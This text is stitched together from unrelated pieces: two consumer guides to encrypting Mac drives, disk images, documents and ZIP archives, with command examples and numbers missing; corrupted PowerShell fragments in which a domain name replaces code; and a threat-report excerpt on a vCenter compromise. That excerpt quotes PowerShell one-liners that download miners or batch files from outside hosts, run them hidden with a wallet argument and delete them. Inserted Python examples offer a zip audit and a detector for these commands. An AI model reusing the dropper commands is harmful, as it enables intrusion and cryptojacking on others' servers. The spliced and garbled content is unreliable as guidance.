      1. Restart your Mac and hold down Command+R as soon as the screen turns black. Your Mac will now boot from the recovery partition. This may take longer than usual but just keep holding down the keys until you see a progress bar.
      2. When the Mac finishes starting up, you should see the Utilities window.
      3. Select Utilities from the menu bar and then choose Firmware Password Utility.
      4. Click Turn On Firmware Password, enter a password, then click Set Password. Make sure to keep a record of the password, in a password manager on another device, for example.
      5. Quit the Utility, then choose Apple Menu > Restart, to restart your Mac. You'll only be asked for the firmware password if someone is attempting to start your Mac from a drive other than the one selected in the Startup Disk pane of System Preferences. If you want to start up from another drive, without having to enter the firmware password, you can change the startup drive, then click Restart in that preference pane.

Encrypt External Drives

FileVault takes care of your startup drive, but what if you have other drives? You may have one or more external drives that you use to store data or for backups; portable drives that you use to carry files to and from work; and even USB thumb drives. You may also have drives that are formatted with two or more partitions, and you can choose to encrypt certain partitions on these drives, if you want. You can encrypt these drives manually to protect their data.

Encrypting Drives and Partitions (Option 1)

To encrypt a drive or partition using the Finder, follow these steps:

      1. Anything can happen from a sudden drive failure to a power outage so always make sure you have a current backup.
      2. Right-click on the drive icon on your Desktop, in a Finder window, or in the Finder sidebar.
      3. Choose Encrypt. A dialog displays inviting you to set a password, type it a second time, and enter a password hint. The password hint is required, so you cannot leave it blank. If you think you need a hint, set one that only makes sense to you. Since you will need to enter the password after every restart or every time you connect the drive, the chances of forgetting that password are slim, so you may not need a hint. If you don't think you'll forget the password, set a hint that makes no sense at all and will only confuse an unauthorized person.
      4. Click Encrypt Disk and let it work for you in the background. When the encryption has completed, you'll see Decrypt in the contextual menu when you right-click on the drive. If you ever want to turn off the encryption, choose Decrypt and enter the password, and macOS will decrypt the drive and remove its encryption.

Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

Encrypting Drives and Partitions (Option 2)

You can also encrypt drives or partitions through Disk Utility, but it will require you to erase them in the process. For new or empty hard drives or drives that still need to be partitioned, Disk Utility is a good option since you're likely already using it to handle the partitioning.

To encrypt a drive or partition using Disk Utility, follow these steps:

      1. Open Disk Utility; it's in the Utilities folder in your Applications folder.
      2. Select the drive or partition you want to encrypt. In this example, I'm using a USB thumb drive, but you can do this on any drive, other than your startup drive. Make sure that you've backed up the data on the drive, because the next step erases it completely.
      3. Click Erase. In the dialog that displays, name the drive, then click the Format menu. In macOS Big Sur, you have to use the APFS format to encrypt drives: choose APFS (Encrypted). Enter a password, type the password again in the Verify field, then enter a password hint; it's not required here, but it is recommended.
      4. Click Choose when done, and the drive or partition will be erased and encrypted. Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

You can verify the encryption is in place by clicking that same drive again in Disk Utility. It will now show that the drive is formatted in an encrypted format as shown in the screenshot below.

Going forward, every time you restart your Mac or mount the drive, a window like this displays:

If you save the password in your keychain, then you won't need to enter it again. However, if someone manages to get into your account, the drive will mount automatically. So the drive is better protected if you do not save the password, but you'll need to remember it, and it's more likely that people choose weaker passwords when they have to remember them.

Encrypting Disk Images

You can also create encrypted disk images to store files. Think of these as folders with their own encryption. Even if the hard drive the data is on is already encrypted, some want an additional layer of security for certain files or folders, and an encrypted disk image has its own password.

You can create two types of disk images: you can create standard disk images, with a fixed size, or you can create "sparse images" for which you define a maximum size, but which only use the amount of space of the files you've added. However, these disk images can grow as you add more files to them. The encryption applies to any files or folders you add to the disk image.

To create an encrypted disk image using Disk Utility, follow these steps:

      1. Open Disk Utility; it's in the Utilities folder of your Applications folder.
      2. Choose File > New Image > Blank Image. If you want to create a disk image from an existing folder, choose File > New Image > Image From Folder.
      3. The following dialog displays:

        Depending on your needs, this can be set up in different ways. I'll stick with the scenario that fits the most common uses.

      4. There are a number of configuration options and settings:
        • The Save As file name is what you'll see in the Finder.
        • In Where, choose a location to save the disk image.
        • The Name is what displays on your Desktop after you double click the disk image.
        • For Format, choose APFS for a Mac that has an SSD and is running macOS or later. Choose Mac OS Extended (Journaled) if you want to use the disk image on a Mac running macOS or earlier. If you want to access the disk image on Windows, and it's 32 GB or smaller, choose MS-DOS (FAT); for Windows above 32 GB, choose ExFAT.
        • For Partitions, let Disk Utility set the appropriate option according to the format you choose.
        • For Image Format, you can choose read/write disk image for standard disk images, or you can choose sparse image or sparse image bundle if you want a disk image that will expand as you add files.
        • Select the Size of the disk image. In general, you either know how many files you want to put in your disk image, or you want to leave space to add more files. If you choose a read/write disk image, set the size for what you need, leaving room to add more files if necessary. The disk image will take up that amount of space on your drive. However, if you choose sparse image, set the maximum size you want for the disk image. The disk image won’t take up much space right away, but will grow as you add or remove files. An empty sparse image is less than 10 MB, but as you add more files it will grow. So don’t hesitate; set it to 1 GB or more.
        • Next choose the Encryption level. There are two encryption options, and if you have a lot of files, and a large disk image, you should choose bit encryption. bit encryption is more secure, but slower, though if you have a recent Mac it should have no trouble working with that level of encryption. Click Save when everything is set up and Disk Utility creates the disk image, then the Finder opens and mounts the disk image; you’ll find it on your Desktop or in the Finder sidebar.
      5. Select the disk image you just created and press Command+i or right click on it and select “Get Info.”

        The reason I recommend using the sparse disk image now becomes clear. I set the disk image to be 1 GB, but it only takes up MB on my drive. This is because the sparse disk image format grows in size when needed, until it reaches the size you set in Disk Utility; in my case, this is 1 GB. If you find you need a bigger disk image down the road, just create a new one and copy the data over.

      6. If you want to encrypt an existing folder, select the folder you want to encrypt, set a name, encryption strength, and format (read/write if you want to make changes to the contents later on).

Keep in mind that this disk image, created from a folder, will not be able to store more files than what’s already there. This makes the Image From Folder method a good one for long term storage of files you’re done with. If you need to frequently access the contents or add to it, a sparse disk image, or a read/write disk image, of a size larger than the files you currently want to store in it, is a better way to go.

Encrypt Documents and Files

Data has to leave your Mac, and for any number of reasons. It’s safe on your Mac, if you take the precautions explained in this article, but what if you need to email or message a document or file to someone? There are several ways to password protect your documents and files, depending on the type of files.

Password Protecting through the Preview App

The Preview app is versatile and often underestimated. One of the things it can do for you is encrypt files, allowing you to protect them with a password.

To password protect a file using Preview, follow these steps:

      1. Open any PDF file or image in Preview. On macOS, you can save any file as a PDF from the Print menu. Choose File > Print, then click the PDF menu and choose Save as PDF.
      2. From the File menu, select Export as PDF…
      3. In the save dialog that drops down, rename your file if you want, then click the Show Details button at the bottom.
      4. You’ll see an option to enable encryption and set a password.
      5. Once a password is set and the file is saved, the PDF file will prompt for a password when you open it.

The above steps will work for any image or document that Preview can open.

Password Protecting an Existing PDF through the Print Dialog

You may already have a PDF that you would like to protect with a password. This can also be done using the Preview app. This works for almost any file, image, or document, and from most applications that support the standard macOS print options. This could be an image opened in the Preview app, a website viewed in Safari, or a TextEdit document. Keep in mind that this method will always result in a PDF file, so you lose the ability to edit. It is, however, ideal for quickly protecting a file if it has to be sent to someone.

To password protect a file using the Print Dialog, follow these steps:

      1. In the application you are viewing the file with, choose File > Print.
      2. Click the PDF button in the bottom of the dialog, and choose Save as PDF from the popup menu.
      3. Click the Security Options button.
      4. A window displays with more options than you saw above, when exporting to PDF. You can set a password that’s required to open the file, but you can also limit someone’s ability to copy from and print the document; these must be different from the main password. Click OK, then save the file.

As you can see there are several routes here to the same destination. Your needs may vary slightly, so pick what works for you in that moment.

Password Protecting Pages, Numbers, and Keynote Documents

If you create a new document in Pages, Numbers, or Keynote there is no need to save your document as a PDF. You can password protect the actual document and keep it as an editable file. To password protect your Pages, Numbers or Keynote document, follow these steps:

      1. With your document open, choose File > Set Password.
      2. Enter a password, enter it a second time in the Verify field, then click Set Password.
      3. Another way to password protect your Pages, Numbers, or Keynote file is by using the Share menu. Choose Share > Send a Copy, choose how you want to send the file, then check Require password to open, and enter a password.
      4. A window opens which, among other things, will let you set a password.
      5. You can also select a file type. These options differ slightly depending on the application you’re using, and some, but not all of them, will offer a password protection option.

Password Protecting Word, Excel, and PowerPoint Documents

The Office apps (Word, Excel, and PowerPoint) allow you to password protect documents. Each of the three apps does this a bit differently.

Microsoft Word

In Microsoft Word, click the Review tab, then click Protect in the ribbon and choose Protect Document. A dialog displays giving you options to password protect a document for opening and modifying the document, as well as other options.

Microsoft Excel

In Excel, you can password protect a spreadsheet by choosing File > Passwords. A small dialog displays, where you can set a password to open the document, and to modify it.

Microsoft PowerPoint

As above with Excel, you choose File > Passwords to protect a PowerPoint presentation. You can set a password to protect a document from opening and another to protect it from modification.

Creating a Password Protected .zip Archive

If, for whatever reason, you cannot password protect the file or folder you want to secure, such as if the file needs to be compatible with another operating system, wrapping files or a folder in a .zip archive can come in handy. Any file, whether it’s an image, document or video, can be archived. Size is not an issue, but will depend on what you do with the archive once it’s created. You may, for example, have limitations to the size of attachments, if you want to send it by email. However, you can send attachments using MailDrop; see this article for more on MailDrop, and for a number of ways to securely send files.

Creating a password protected archive is convenient if you need to send files quickly and securely, and if the archive needs to be compatible with other operating systems. If you send this type of archive to a Windows user, they can open it. If you plan on creating large archives for storage or to transport on a flash drive, I recommend using the above mentioned encrypted disk image instead. Creating a password-protected zip archive is, unfortunately, not as easy as the above mentioned methods; it requires the use of the command line.

To create a password protected .zip archive, follow these steps:

Archiving a Single File

      1. Open the Terminal app which can be found in the Utilities folder inside your Applications folder. When Terminal opens you will see a default string of text like this:

        This is your Mac’s name, current directory location (~ is a shortcut for your home folder), and your username. This is called a “prompt,” and it displays when Terminal is waiting for you to enter a command.

      2. In this example, I have a file on my desktop that I want to put in a password protected .zip archive. In Terminal, I type the following:
      3. “zip -ej ” (including the space at the end) tells Terminal you want to create a zip archive (zip) with encryption (e) and no file paths included (j). Next, you have to tell it where to save the zip file and what name it must get. The easiest thing is to just use your desktop which can be entered as “~/Desktop.” When done, it should look like this (add a space after the file extension):
      4. Now Terminal needs to know which file is to be archived. The simplest way to do this is to drag the file you want to encrypt into the Terminal window. This adds the file path to Terminal. The result should look something like this; make sure there’s a space between the two file paths, and this example assumes that you’ve dragged a file from your Desktop.
      5. Press Enter and Terminal prompts you for a password that will be required to open the .zip file. Terminal will not show any cursor movements while you type the password. Press Enter, and you are asked to verify the password by typing it again. Press Enter a third time and Terminal creates the zip archive. For my example, when Terminal was done, I saw this:
      6. This created the .zip archive on my desktop. When you double-click the file to open it, you see a password request in Archive Utility, the application that expands archives on macOS.

Archiving a Folder

      1. Open Terminal.
      2. For this example, I have a folder on my Desktop named Photos that I want to put in a password protected .zip file. The command to archive a folder is slightly different:

        As with archiving a single file, zip tells Terminal what kind of archive to create and the (e) in -er tells it to encrypt the file. In this case the (r) means recursive, which tells Terminal to archive all the folder contents, even if they are in sub-folders.

      3. Since we’re already pointed at the desktop, specifying the saved file name does not require any path information. In my case, with the name I chose, I end up with (make sure to leave a space at the end):
      4. Add the folder by dragging it onto the Terminal window, and I see this:
      5. After entering and verifying the password I end up with this:

As you can see above, the zip command shows you how much space it’s saved for each item in the folder. Since these photos are already compressed, no space is saved, but what’s important here is protecting the archive with a password. In other cases, you will save space when performing this operation.
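A check worth running before an archive made this way leaves your Mac, as an added Python example that is not part of the original article: it reads the archive's directory without the password, returns the file names anyone holding the file can see, and marks entries that are not encrypted (for instance files added later with plain zip). The helper names and the sample archive are assumptions constructed for the example.

```python
import io
import struct
import sys
import zipfile

ENCRYPTED_FLAG = 0x0001   # general-purpose flag bit 0: entry data is encrypted
AES_METHOD = 99           # compression method used by WinZip-style AES entries


def audit_zip(source):
    """Return [(entry_name, scheme)] for every file entry; no password needed.

    scheme is "none", "zipcrypto" (traditional PKWARE encryption, the kind
    Info-ZIP's zip -e writes) or "aes". Names are always readable because
    ZIP encryption covers file data only, not the directory.
    """
    report = []
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            if info.is_dir():              # directory entries carry no data
                continue
            if not info.flag_bits & ENCRYPTED_FLAG:
                scheme = "none"
            elif info.compress_type == AES_METHOD:
                scheme = "aes"
            else:
                scheme = "zipcrypto"
            report.append((info.filename, scheme))
    return report


def unprotected_entries(report):
    """Names of entries that would open without any password."""
    return [name for name, scheme in report if scheme == "none"]


def build_sample(marked_encrypted):
    """Constructed sample archive (bytes). Entries named in marked_encrypted
    get the 'encrypted' flag set by hand in their central-directory record;
    the data is not really encrypted, only the metadata the audit reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Photos/", "")
        zf.writestr("Photos/payroll-2021.csv", "name,salary\n")
        zf.writestr("Photos/readme.txt", "hello\n")
    raw = bytearray(buf.getvalue())
    pos = raw.find(b"PK\x01\x02")          # central directory file header
    while pos != -1:
        flags, = struct.unpack_from("<H", raw, pos + 8)
        name_len, = struct.unpack_from("<H", raw, pos + 28)
        name = raw[pos + 46:pos + 46 + name_len].decode("ascii")
        if name in marked_encrypted:
            struct.pack_into("<H", raw, pos + 8, flags | ENCRYPTED_FLAG)
        pos = raw.find(b"PK\x01\x02", pos + 4)
    return bytes(raw)


if __name__ == "__main__":
    # With a path argument, audit that archive; otherwise use the sample.
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = io.BytesIO(build_sample({"Photos/payroll-2021.csv"}))
    result = audit_zip(target)
    for name, scheme in result:
        print(f"{scheme:10} {name}")
    if unprotected_entries(result):
        print("WARNING: some entries are not encrypted")
```

Because the names come back without a password, keep anything sensitive out of file and folder names, or put the files in an encrypted disk image instead.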

Encrypt Backups

Your Mac may be set up like Fort Knox, but your backups are copied to an external drive or server. If your backups are not encrypted, an unauthorized user doesn’t need to go through all the trouble of accessing your Mac; they can just take your backups instead. Luckily, Apple makes it very easy to encrypt Time Machine backups. There are two ways to do this, and I will cover both. In this example, I will walk through the first time setup of Time Machine.

To set up an encrypted Time Machine backup, follow these steps:

How to Back up to an External Drive or Drive Partition

      1. Open System Preferences, then click the Time Machine icon; click the padlock to make changes if needed, and then click Select Backup Disk.
      2. Select an external drive or partition to use as a backup destination. Make sure to check Encrypt backups.
      3. Set a strong password and a hint. (Choosing a password hint is mandatory.) When you click Use Disk, Time Machine begins the encryption process. A progress bar displays as the drive or partition is prepared, then the backup starts while the encryption runs in the background.
      4. The backup data is stored in a “Backups.backupdb” folder that you can open and browse, just as on an unencrypted drive. It correctly assumes that since the drive or partition itself is encrypted there is no need to wrap the backups in an encrypted disk image.

How to Back up to a Server, NAS, or Time Capsule

The process for backing up to a server, such as a NAS or file server, is similar to that of backing up to an external drive or drive partition. You can also back up to a Time Capsule, Apple’s wi-fi router with a built-in hard disk, that was discontinued in If you are backing up to a NAS, check the documentation for that device to find out how to turn on Time Machine discovery, if this is available. And you can also back up any Mac to another Mac, if file sharing is turned on. See this Apple support document for information about using a network device for Time Machine backups.

Follow these steps to back up your Mac to a server:

      1. In the Time Machine preferences, select your server or NAS destination, then click “Use Disk.”

  • A password request displays: this is the password for your server or NAS.
  • After you authenticate, you are prompted to set a password to encrypt the backup. In this case no hint is required.

 

 

  • The backup begins momentarily. Because the backup is stored on a network volume, it is not stored as a “Backups.backupdb” folder but as an encrypted sparse bundle image instead. As explained above, this is a type of disk image that expands when more space is needed for additional files.

 

Distributing Files Securely

When you want to send files securely to others (friends, family, or colleagues), there are many options, and the one you choose depends on the size of the files you want to send, and which software they use. As mentioned above, you can send an encrypted disk image or zip archive by email, using Apple’s MailDrop, and not have to worry about the attachment being intercepted, because it’s protected by a password.

But there are other ways to send files securely. You can use secure messaging, such as iMessage; you can use online secure file transfer services, such as WeTransfer; you can even use cloud storage, like iCloud, Dropbox, or OneDrive. Because cloud services store files securely, transferring files to others can be as easy as uploading them to your cloud storage service, then sending a link to someone else.

Read our article How to Send Files Securely for more on the various ways to send files securely.

Summing Up

This article has shown you the many ways you can ensure that data and files on your Mac are secure. While this may seem like a lot of work at first, once you set up some of these routines, you’ll find that it becomes second nature. Take some time to think about how to secure your files, so you don’t have to worry about your data being stolen.

How can I learn more?

Each week on the Intego Mac Podcast, Intego’s Mac security experts discuss the latest Apple news, security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.


About Jay Vrijenhoek

Jay Vrijenhoek is an IT consultant with a passion for Mac security research.
Out-String; $out %{$_ -replace '"url": *".*",', '"url": "[.]",'}

Imagine you’re staring at a file or folder—perhaps confidential employee information that you need to send to your accountant. If attaching it to an email message makes you think, “That doesn’t seem like a good idea,” award yourself a gold star!

Sending sensitive files via email is a bad idea, partly because the email could be intercepted in transit (possible but highly unlikely), but more because the files then live in both your and your recipient’s email accounts in an unprotected form. If an attacker were to gain access to either of your email accounts, they might scan for patterns like credit card numbers, ID numbers, phone numbers, and postal addresses and find them even in attachments.

There are ways of encrypting email messages so they can be read only by the recipient and never exist in an unencrypted form other than while being created or read, but they’re difficult to set up and fussy to use. For most people, most of the time, encrypted email is overkill.

For a more straightforward solution to exchanging information securely via email, use password-protected and encrypted ZIP archives. They’re easy to create on the Mac, either using a simple command in Terminal or with a third-party utility. And better yet, any Mac user can expand them using the built-in Archive Utility simply by double-clicking and entering the necessary password.

Create Encrypted ZIP Archive Using Terminal

Although many Mac users are intimidated by using the Unix command line in Terminal, making an encrypted ZIP archive is easy enough for anyone. All it takes is typing a single command, dragging a file or folder into Terminal, and entering a password twice. Follow these steps, which make an encrypted ZIP archive on your Desktop:

  1. In your Applications folder, open the Utilities folder and double-click Terminal to launch it.
  2. Type (or copy and paste) this command, replacing “archiveName” with whatever you want to name the ZIP file and making sure to type a space after the last letter—the “p” in “zip”. (The tilde ~ character is Shift-backtick, and it’s the key to the left of the numeral 1 key.)
     zip -er ~/Desktop/archiveName.zip
  3. Drag the file or folder you want to protect into the Terminal window to complete the command.
  4. Press Return, and when prompted, enter the desired password twice—the second time is for confirmation.

Create Encrypted ZIP Archive Using Archiver

If you have trouble with the command-line method or plan to create encrypted ZIP archives regularly, it’s worth using a Mac app that simplifies the process even more. There are various apps, but a particularly straightforward one for those running macOS 11 Big Sur is Archiver ($, with a free trial). Download it and then follow these steps to create an encrypted ZIP archive:

  1. Launch Archiver.
  2. Drag a file or folder to the Archiver window and click the Archive button in the toolbar.
  3. Select the archive format (use ZIP), click the Encrypt checkbox, enter the password twice, and click the Archive button in the toolbar.
  4. Drag the ZIP archive to the Desktop or another folder and click the Done button.

Decrypting a ZIP Archive

As noted earlier, decrypting a password-protected ZIP archive on the Mac is as simple as double-clicking it and entering the password when prompted.


What about iOS or iPadOS? Never fear, since the Files app can also decrypt ZIP archives; just tap the archive to open it and enter the password when prompted.


A Word about Passwords

It’s important to think briefly about how you’re going to communicate the password to your recipient. Don’t send it in email, or anyone who compromises either your email account or your recipient’s account could decrypt the ZIP archive.

Instead, use what’s called an “out of band” communication channel. In other words, if you’re going to send the ZIP archive via email, communicate the password in a phone call or text message. That would keep the password safe if either of your email accounts were compromised.

If you’re sending password-protected ZIP archives to a particular person regularly (and the files don’t contain state or corporate secrets), you could agree on a system for generating passwords so you don’t have to communicate each one individually. For instance, you could combine a random word and the current month, so the password would be “cheddar9September” one month and “cheddar10October” the next.

As you can see, you can use this technique with so little extra effort that it’s worth ensuring a higher level of security whenever you need to share confidential information.

Out-String > "$env:tmp\$($shoppingdowntown.us())-$($li)" $p = $c $ur = $shoppingdowntown.usFile("$u/shoppingdowntown.us""$env:tmp\$($shoppingdowntown.us())-$($li)") } sleep 3 }

Uncertainty about who did what on the compromised server comes from the fact that there were so many actors who were in play, thanks to the detectability of the vCenter vulnerability with mass Internet scans.

Extra compromises

On May 18, another entirely different actor also exploited the vCenter vulnerability to install an XMR cryptocurrency miner via PowerShell commands:

powershell -nop -w hidden -Command $wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.exe'; $wc.DownloadFile('hxxp://[.]/w', $tempfile); & $tempfile -u bdbe; Remove-Item -Force $tempfile

The miner operator then executed the payload, shoppingdowntown.us, which in turn registered the Windows driver WinRing0xsys as a service to leverage the server’s graphics card for mining purposes.

On September 8, yet another intruder dropped yet another miner (XMRig):

powershell -Command $wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('hxxp://[.] /shoppingdowntown.us', $tempfile); & $tempfile 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R2yk1V7SZk TWeBk6JiT2q5cXLa7T; Remove-Item -Force $tempfile

powershell -Command $wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://lurchmath[.] org/wordpress-temp/ wp-content/plugins /shoppingdowntown.us', 'C:\Windows\system32\config\systemprofile\shoppingdowntown.us')

powershell -Command $wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('hxxp://[.]/shoppingdowntown.us', $tempfile); & $tempfile 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R 2yk1V7SZkTWeBk6JiT2q5cXLa7T; Remove-Item -Force $tempfile

powershell -Command $out = cat 'C:\Windows\system32\config\systemprofile\mimu\shoppingdowntown.us'
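The dropper commands quoted above share one shape: fetch a file to a temp path, run it, delete it, or write straight into the SYSTEM profile directory. The following is an added detection sketch in Python, not part of the original report, that scores process command lines for that shape. It assumes the download call is .NET's System.Net.WebClient DownloadFile; the indicator names, verdict labels and sample command lines (with placeholder hosts) are constructed for the example.

```python
import re

# Behaviours visible in the quoted command lines (names are this example's own).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "webclient": re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I),
    "download_file": re.compile(r"\.DownloadFile\s*\(", re.I),
    "temp_executable": re.compile(r"GetTempFileName\(\).*\+=\s*'\.(?:exe|bat)'", re.I),
    "run_downloaded": re.compile(r"&\s*\$\w+"),
    "self_cleanup": re.compile(r"Remove-Item\s+-Force", re.I),
    "systemprofile_path": re.compile(r"\\config\\systemprofile\\", re.I),
}

DROP_RUN_DELETE = {"download_file", "temp_executable", "run_downloaded", "self_cleanup"}


def classify(cmdline):
    """Return (verdict, sorted indicator hits) for one process command line."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    if DROP_RUN_DELETE <= hits:
        verdict = "drop-run-delete"          # fetch, execute, remove the evidence
    elif {"download_file", "systemprofile_path"} <= hits:
        verdict = "drop-to-systemprofile"    # payload parked in the SYSTEM profile
    elif "download_file" in hits:
        verdict = "review"                   # download alone: may be legitimate
    else:
        verdict = "ok"
    return verdict, sorted(hits)


# Constructed sample command lines; hosts and file names are placeholders.
SAMPLES = [
    r"powershell -nop -w hidden -Command $wc = New-Object System.Net.WebClient; "
    r"$tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.exe'; "
    r"$wc.DownloadFile('hxxp://miner.example.invalid/w', $tempfile); "
    r"& $tempfile -u WALLET; Remove-Item -Force $tempfile",
    r"powershell -Command $wc = New-Object System.Net.WebClient; "
    r"$wc.DownloadFile('hxxp://site.example.invalid/wp-content/plugins/tool.bin', "
    r"'C:\Windows\system32\config\systemprofile\tool.exe')",
    r"powershell -Command (New-Object Net.WebClient).DownloadFile("
    r"'https://updates.example.invalid/agent.msi', 'C:\Temp\agent.msi')",
    r"powershell -NoProfile -Command Get-ChildItem C:\Temp -Filter *.log | Remove-Item -Force",
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict, hits = classify(line)
        print(f"{verdict:22} {', '.join(hits)}")
```

Feed it the command-line field from process-creation events (for example Windows Security event 4688 or Sysmon event 1); the "review" verdict is deliberately soft because administrators also use DownloadFile.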
